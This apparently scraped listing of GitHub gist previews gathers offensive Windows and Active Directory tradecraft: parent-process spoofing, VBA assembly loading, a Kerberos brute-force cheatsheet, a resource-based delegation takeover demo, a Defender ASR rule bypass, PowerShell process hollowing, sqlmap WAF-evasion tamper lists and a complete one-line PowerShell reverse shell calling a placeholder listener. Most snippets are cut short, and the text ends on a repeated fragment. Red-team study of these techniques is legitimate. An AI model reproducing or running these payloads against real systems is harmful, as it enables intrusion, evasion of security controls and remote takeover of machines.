rasta-mouse / PPID Spoof & BlockDLLs

Last active April 1, 2025 22:39

	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;

	namespace BlockDllTest
	{
	class Program
	{
	static void Main(string[] args)
	{

monoxgas / mscorlib_load_assembly.vba

Last active May 18, 2023 13:30

VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown

	' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

	Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
	Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
	Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

	#If Win64 Then
	Const LS As LongPtr = 8&
	#Else
	Const LS As LongPtr = 4&

TarlogicSecurity / kerberos_attacks_cheatsheet.md

Created May 14, 2019 13:33

A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

HarmJ0y / rbcd_demo.ps1

Last active January 4, 2025 14:26

Resource-based constrained delegation computer DACL takeover demo

	# import the necessary toolsets
	Import-Module .\powermad.ps1
	Import-Module .\powerview.ps1

	# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
	whoami

	# the target computer object we're taking over
	$TargetComputer = "primary.testlab.local"

seajaysec / customqueries.json

Last active February 12, 2025 16:58

bloodhound custom queries

	{
	"queries": [{
	"name": "List all owned users",
	"queryList": [{
	"final": true,
	"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
	}]
	},
	{
	"name": "List all owned computers",

infosecn1nja / ASR Rules Bypass.vba

Last active August 14, 2024 08:33

ASR rules bypass creating child processes

	' ASR rules bypass creating child processes
	' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
	' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
	' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

	Sub ASR_blocked()
	Dim WSHShell As Object
	Set WSHShell = CreateObject("Wscript.Shell")
	WSHShell.Run "cmd.exe"
	End Sub

xenoscr / Start-Hollow.ps1

Created June 13, 2018 12:02

Process Hollowing with PowerShell - by FuzzySec

	function Start-Hollow {
	<#
	.SYNOPSIS
	This is a proof-of-concept for process hollowing. There is nothing new here except
	maybe the use of NtCreateProcessEx which has some advantages in that it offers a
	convenient way to set a parent process and avoids the bothersome Get/SetThreadContext.
	On the flipside CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious API's.

	I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible
	to load the Hollow from an internal byte array straight into memory but I have not

wdormann / acltest.ps1

Created May 1, 2018 15:20

Check for paths that are writable by normal users, but are in the system-wide Windows path. Any such directory allows for privilege escalation.

	If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
	Write-Warning "This script will not function with administrative privileges. Please run as a normal user."
	Break
	}

	$outfile = "acltestfile"
	set-variable -name paths -value (Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment' -Name PATH).path.Split(";")
	Foreach ($path in $paths) {
	# This prints a table of ACLs
	# get-acl $path \| %{ $_.Access } \| ft -Wrap -AutoSize -property IdentityReference, AccessControlType, FileSystemRights

ohpe / RS.ps1

Last active October 14, 2024 19:46

PowerShell Reverse Shell

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

sapran / sqlmap tamper scripts

Last active September 2, 2024 01:34

sqlmap tamper scripts grouped by DBMS Copied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf

	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	# Microsoft access
	```

S3cur3Th1sSh1t

Kerberos cheatsheet

Bruteforcing